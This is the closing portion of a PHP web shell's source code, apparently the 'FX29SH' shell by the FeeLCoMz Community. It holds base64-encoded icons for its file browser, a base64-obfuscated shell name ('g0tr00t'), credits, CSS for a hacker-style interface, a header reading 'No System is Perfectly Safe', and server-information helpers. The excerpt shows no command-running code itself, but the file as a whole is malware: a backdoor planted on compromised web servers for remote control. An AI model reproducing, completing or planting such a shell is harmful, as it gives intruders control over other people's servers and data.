3212'R0lGODlhGAAYAKIGAB9fHVu2T7nirIbKdjaXL+z36P///wAAACH5BAHoAwYALAAAAAAYABgAAAOc'.
3213'aLrc/g1ICSsZIosRSGWXUGjaQAAfIY7Z4GIc+qgFy734+Qxsy2+BV8dBGPVeI04wEJAtfiSgSMCs'.
3214'Og2AEu5Wo1Z1iuwGsymvChxCxynG1N7wWocAxmaCGVZcQKezYVVfPCNzJ1cBYzdMF4R9dWEwQkFy'.
3215'hY8KF5KIaI6WYUGKS5ydYReBapxXDgBqpn0UH2Grjq+wDBMTtbm6uwsJADs=',
3216 "up"=>
3217'R0lGODlhGAAXAKIGABxXG0irPrLeo3zFbzWFMOLz3v///wAAACH5BAHoAwYALAAAAAAYABcAAAOP'.
3218'aLrc/jBKMoa4lRCp6C1XOASbNBQgVq1D6XipsAYs+RCoAFZ5QNMEQIOSq+hQO59PyAjoMEckauQL'.
3219'MnBQaS5JYnZ2Tx6INu5ed5bRqUClmhcEEU3srlrhIZlsXSe8OxZ6K1NKJAFecIEshFV/CwBONRiN'.
3220'dy9zFYVKGohDlz92AJw3mSRBohGhqaEcrK2uDgkAOw==',
3221 "help"=>
3222'R0lGODlhGAAYAKIGADlqzKjA6O3x932d3rPk/12Byv///wAAACH5BAHoAwYALAAAAAAYABgAAAOa'.
3223'aLor7ixK8+qb0eqLN/mENVlfYJpDUEkPMaSh474xwbTvsA3AEN8CV6GgEhR6Dh5SEFA8BkeASgmQ'.
3224'Aa4/igMQvXoLjoBXJ3AGu95rMQ0ua8Vpb5HKhWgJ8SsZfbVb8ypwaWRmRoACdHp2Wol5aTINW3Ep'.
3225'fHtAgn1MbByRmnKIXw8FLE9fV0ScEkVhKSYrGAqrG02wEa6stbm6CQA7',
3226
3227 "change"=>
3228'R0lGODlhEAAQALMMADMuME2f58e2ON7OMsXZ88wpTd/t/FhYU4x9erCwrIWSpW54iwAAAAAAAAAA'.
3229'AAAAACH5BAHoAwwALAAAAAAQABAAAARckMlJ6wQn6wMsW0QoBktXLUaaEkHAIYiJqiuhFAUg0yqR'.
3230'IAKdZMYzIAacCbGXEAyEQ0IvlEAeKCCDVJpompRbkUJzEokBi0XZTFgoCFfKwa1Q0NNxCmazz3v+'.
3231'DBEAOw==',
3232 "delete"=>
3233'R0lGODlhEAAQAKIGAJIMJNMHLckjQURDQ2oqNigoKAAAAAAAACH5BAHoAwYALAAAAAAQABAAAANP'.
3234'KDHW/k4JBiuRFI5pilBE8RQX12yBIHYfMGTeNxQoMVfbJ7gZ5AWpV8VBU6SGkVSpR7zwdISKURgz'.
3235'dS4B2yMXMgyAWo2OBGQ6cq+NmbhJAAA7',
3236 "download"=>
3237 "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
3238 "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
3239 "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
3240 "setup"=>
3241 "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
3242 "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3243 "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
3244 "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
3245 "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
3246 "small_dir"=>
3247'R0lGODlhDwAQALMPAAkJCXV3iEFvz5it4MXV8lFkqXaU2au+6EtMViQkJYGGq2JjcUFhunN3ljc3'.
3248'OQAAACH5BAHoAw8ALAAAAAAPABAAAARuEKDVVEsv64wO+UfjOBO1AM2nHsbQGkaDDCo43EdOVPW9'.
3249'ErmFgjDI6YyHm7AINN5cMESgSH3CBAKGo9GCwgxYrHbx/YbDYwEYfEY7Fu149s2QZxkFRQJRR+Mb'.
3250'AQsOAA98DH8NggCEGgmAiowbGREAOw==',
3251 "small_unk"=>
3252'R0lGODlhEAAQAKIHABpFnoap3bTL89vq/FuCvVZlhH6Ms////yH5BAHoAwcALAAAAAAQABAAAANL'.
3253'eBfcrVCFQetgJS5bA/nRxFlGJlUFoBICZUDi6gGsYG5DWqntLZI8G4xDCApPHeMR5wL8lgbSE9rq'.
3254'OavUqurngTm+ntuhQC6byYcEADs=',
3255 "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
3256 "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
3257 "sort_asc"=>
3258 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
3259 "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
3260 "sort_desc"=>
3261 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
3262 "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
3263 "ext_asp"=>
3264 "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
3265 "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
3266 "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
3267 "ext_mp3"=>
3268'R0lGODlhEAARALMPADE8XE6ekMSuNMDW7M1IRGRoZOXs9Ki31Y2HW3PEiFl2u19RX4ajzNmCeuew'.
3269'pwAAACH5BAHoAw8ALAAAAAAQABEAAASI8D1Gqy0yM8O7GRSmeR2oKOJEcgN4oJJyNExSD197iAjS'.
3270'OI2EkIFrYQqN3+cgRBA/iwLhh+MwE4HDYLeYGg4MLTNQCBi7joECcKKQC9tCV7tmhwoALV5BPMnA'.
3271'PXk7BSc5LA4CCAUHXCcHHogChIwYbG2RkgVhOxKWCggCkgCafCkAp6inBaurEQA7',
3272 "ext_avi"=>
3273'R0lGODlhEAAQALMMAAUFBY2OkM7T2UpKSqWoq+zz/GhoaSQkJLW4u1paWnp6ejY3NwAAAAAAAAAA'.
3274'AAAAACH5BAHoAwwALAAAAAAQABAAAARdkMkpgVGH6poIwttkeQUBbqNQrGZGjYG6lobLWAoixHOw'.
3275'GByDbpUrAQ6K2+AoW/0OyOMy4GtioozBgsAaqBDa08AwoxHCgMmPRzSM05R17x2SBxKn+uUCD0nW'.
3276'fRoRADs=',
3277 "ext_cgi"=>
3278'R0lGODlhEAAQAKIHAEhJS+q8D/7dNfnulpR/U5pqCtS5eP///yH5BAHoAwcALAAAAAAQABAAAANT'.
3279'eLpX/K9ISItwlElBcG5BMEFSGYolVgzsYAih0Q5FF7IwjAcdcRCE021wKQB8CqCQRQAcH4SXYOck'.
3280'EQUy2DMSMmaBEWITSBAjFZLxAliDghlkRQIAOw==',
3281 "ext_cmd"=>
3282 "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
3283 "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
3284 "dmrYAMn1onq/YKpjvEgAADs=",
3285 "ext_cpp"=>
3286 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
3287 "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
3288 "Eq7YrLDE7a4SADs=",
3289 "ext_ini"=>
3290 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
3291 "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
3292 "SnEjgPVarHEHgrB43JvszsQEADs=",
3293 "ext_diz"=>
3294'R0lGODlhEAAQAKIHAAsZcWyPv7vT6eb0/ThOi1tukZyyy////yH5BAHoAwcALAAAAAAQABAAAANS'.
3295'eHrTLiu6IYh5chZAJlRTI4RDcIyacXkF6gAcWaxPLFJzaNhoZYyoXQcoCMwErgCHuFP8kEVjAGkg'.
3296'FBaqJ9CgvEYOBQK06/0qjlazuSBVr8uLBAA7',
3297 "ext_doc"=>
3298 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
3299 "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
3300 "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
3301 "ext_exe"=>
3302 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
3303 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
3304 "xhIAOw==",
3305 "ext_h"=>
3306 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
3307 "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
3308 "Wq/NknbbSgAAOw==",
3309 "ext_hpp"=>
3310 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
3311 "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
3312 "UqUagnbLdZa+YFcCADs=",
3313 "ext_htaccess"=>
3314 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
3315 "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
3316 "AAA7",
3317 "ext_html"=>
3318'R0lGODlhEAAQALMOAIyt016Itv///2Gp4uXy/c3P/MXl/mtrnC6Z4mfd/Chgk7PO9lBVhnNzc///'.
3319'/wAAACH5BAHoAw4ALAAAAAAQABAAAASF0EkHqq1h6nuzloAgjkIwfJRIFJVxFMgHDGYQCMihe46d'.
3320'/IiBIEEQFA4SkwHBZAaKK2RPAFAACM0nwTUFMAeD5mFBWCCpTIV6rSCbKQkFQpEw2A1lw4LRa84X'.
3321'cn96fAg4gQgJAwwAensOAyFzCgyTAAsFgxKQAywVBZcGn3wTDKWlDaamEQA7',
3322 "ext_jpg"=>
3323'R0lGODlhDgAQALMMACYlIC6NFLOxKnqIcbPIikWoIkVFRWllROLZUmO8NqKmoBBxCAAAAAAAAAAA'.
3324'AAAAACH5BAHoAwwALAAAAAAOABAAAARbMKxJ6zw2iGQHFSACCpQ3CWJISmaBCsABcouJiECOIkVg'.
3325'7gadiBXoAXc9X/LGRBASvUEPmiA4qUXpFPpMZrHQojchJZjDVOpgoGib3+82W8Gu0+nrGD2Y4wcN'.
3326'EQA7',
3327 "ext_js"=>
3328'R0lGODlhDwAQAKIEAB4eHZ6eaOLih2BgWQAAAAAAAAAAAAAAACH5BAHoAwQALAAAAAAPABAAAANP'.
3329'SAoR8nAARcZ4rQkr68VCI1nTB4Vj0H1iALzwpIUY3FXOKb4UwYSqDODmY+ROREtmkEFNhqKRyfV7'.
3330'SFzHEQR62qSAnBxJoVSlxhRJLEZJAAA7',
3331 "ext_lnk"=>
3332'R0lGODlhEAAQAKIHAAAFACOPE2TNNj60IQRKAojuVgdlBAAAACH5BAHoAwcALAAAAAAQABAAAANO'.
3333'eGfcbkCpQOu4AkZlLM5AKHlCqW3TVw4hmqqlKB3UKhQF6AZ2ibM7Ew+Xk6UIoQAROAsgQ4RbIWBc'.
3334'tBbSq0RruD1dB1S3BZ5ZteYZ2ZwAADs=',
3335 "ext_log"=>
3336 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
3337 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
3338 "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
3339 "ext_php"=>
3340'R0lGODlhEAAQAIABAP///////yH5BAHoAwEALAAAAAAQABAAAAIohI8Jwe0Po5wNsRWWxbl3blSe'.
3341'VmHmMWZouj2md7kxB8cfhec6pPRHAQA7',
3342 "ext_pl"=>
3343 "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
3344 "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
3345 "ext_swf"=>
3346 "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
3347 "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3348 "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
3349 "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
3350 "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
3351 "ext_tar"=>
3352'R0lGODlhEAAQAKIFABokHymwoKiYkKIYbdzo4wAAAAAAAAAAACH5BAHoAwUALAAAAAAQABAAAAM4'.
3353'CLrcJVCMSesAJJOhY7waAUgWhWljo67rE7FMGGhzYNtnNt48HsJAlgsSzIlovYAxlfShBMVoIQEA'.
3354'Ow==',
3355 "ext_txt"=>
3356'R0lGODlhCwAQAKIFACoqKqCeoO/z83d2brO2vwAAAAAAAAAAACH5BAHoAwUALAAAAAALABAAAAM5'.
3357'CLM8MSBIJwNZJAhNRBdDR3xCCYqkGXppuZrwuVWj21mVJo+jZG812Cv288VWD+KQtQA4m4CCdJoA'.
3358'ADs=',
3359 "ext_wri"=>
3360 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
3361 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
3362 "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
3363 "ext_xml"=>
3364 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
3365 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3366 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
3367 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
3368 "IQA7"
3369 );
3370 return $images;
3371}
3372function sh_name() { return base64_decode("ZzB0cjAwdA==").sh_ver; }
3373function fx29sh_tools() {
3374 echo "<div class=\"barheader\">.: TooLz :.</div>";
3375}
3376function fx29sh_about() {
3377 echo "<div class=\"barheader\">.: Credits :.</div>".
3378 "Idea, leader & coder: <b>tristram [CCTeaM]</b><br>".
3379 "Beta-tester & tips: <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
3380 "Re-coder, Designer, Windows Fix, PHP Mailer & PHP Filesystem: <b>FaTaLisTiCz_Fx [FeeLCoMz CoMMuNiTy]</b><br>".
3381 "<br>".
3382 "Please report bugs to <a href=\"mailto:feelcomz@yahoo.co.id\">FaTaLisTiCz_Fx</a></b>\n";
3383}
3384function html_style() {
3385$style = '<html>
3386<head>
3387 <style>
3388 table {width: 100%;border-collapse: collapse;}
3389 #main, #maininfo {width: 900px;}
3390 body, table, input, select, option, .info
3391 {
3392 font: 8pt tahoma;
3393 }
3394 .footer {font: 7pt tahoma;}
3395 textarea, .code
3396 {
3397 font: 8pt Courier New;
3398 color: #dedbde;
3399 border: 1px solid #666666;
3400 }
3401 img {border: 0;}
3402 #maininfo img {width: 16;height: 16;}
3403 input, select, option {border: 1px solid #606060;}
3404 #maininfo, td, th {border: 1px solid #3F3F3F;}
3405 a {color: #5B5BFF;text-decoration: none;}
3406 #pagebar a, .barheader a {color: #00FF00;}
3407 a:hover, #pagebar a:hover {color: #3366FF;}
3408 .on {color: #00FF00;}
3409 .off, .errmsg {color: #FF0000;}
3410 body, table, input, select, option {color : #EEEEEE;}
3411 .info th {color: #969696;width: 13%;}
3412 .shell {font-size: 12;color: #C0C0C0;border: 0;}
3413 #pagebar a, .barheader, .errmsg, .on, .off
3414 {
3415 font-weight: bold;
3416 }
3417 p, form, .info, .info td, .info th, .explorer *
3418 {
3419 margin: 0;
3420 }
3421 input, #maininfo {margin: 3px;}
3422 #mainpanel input, #mainpanel select
3423 {
3424 margin: 0px 2px 0px 2px;
3425 }
3426 #maininfo table, select {margin: 2px 0px 2px 0px;}
3427 #pagebar, .bartitle, #mainpanel {background: #474747;}
3428 body, textarea, .shell, input, select, option
3429 {
3430 background: #000000;
3431 }
3432 .info, .info th, .info td, input[type="label"]
3433 {
3434 background: transparent;
3435 border: 0;
3436 }
3437 #pagebar td, #mainpanel td, #mainpanel th, .contents th, .explorer td
3438 {
3439 border-left: 0;
3440 border-right: 0;
3441 }
3442 .bartitle, .barheader, input[type="submit"], input[type="button"], input[type="reset"]
3443 {
3444 color: #D0D0D0;
3445 background: #3F3F3F;
3446 border: 1px solid #202020;
3447 border-top: 1px solid #505050;
3448 border-left: 1px solid #505050;
3449 }
3450 input[type="submit"]:hover, input[type="button"]:hover, input[type="reset"]:hover
3451 {
3452 color: #00FF00;
3453 background: #333333;
3454 }
3455 td, .info th {vertical-align: top;}
3456 .explorer td {vertical-align: middle;}
3457 .fleft {float: left;}
3458 .fright {float: right;}
3459 .code, .fleft, .info th {text-align: left;}
3460 .fright, input[type="label"], #mainpanel th, .contents th
3461 {
3462 text-align: right;
3463 }
3464 #maininfo, .bartitle, .quicklaunch, .quicklaunch a, .barheader, th
3465 {
3466 text-align: center;
3467 }
3468 td, textarea, input[type="text"], .bartitle, .barheader, .code, th
3469 {
3470 padding: 3px;
3471 }
3472 .info th, .info td {padding: 0px 2px 0px 2px;}
3473 .quicklaunch a {padding : 0px 5px 0px 5px;}
3474 </style>
3475
3476 <title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
3477
3478</head>
3479
3480<body><center>
3481
3482';
3483return $style;
3484};
3485function html_header() { return "<b>".sh_name()."</b><br>.: No System is Perfectly Safe :."; }
3486function html_footer() { return "© 2008 By FaTaLisTiCz_Fx, FeeLCoMz Community. Generated: ".round(getmicrotime()-starttime,4)." seconds"; }
3487function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
3488function srv_info($title,$contents) { echo "\t\t\t<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n"; }
3489function srv_software($surl) {
3490 $srv_software = getenv("SERVER_SOFTWARE");
3491 if (!ereg("PHP/".phpversion(),$srv_software)) { $srv_software .= ". PHP/".phpversion(); }
3492 return str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\">PHP/".phpversion()."</a>",htmlspecialchars($srv_software));
3493}
3494
3495########################
3496##[ END OF FUNCTIONS ]##
3497########################
3498chdir($lastdir); fx29shexit();
3499##########################
3500##[ FeeLCoMz Community ]##
3501##########################
3502?>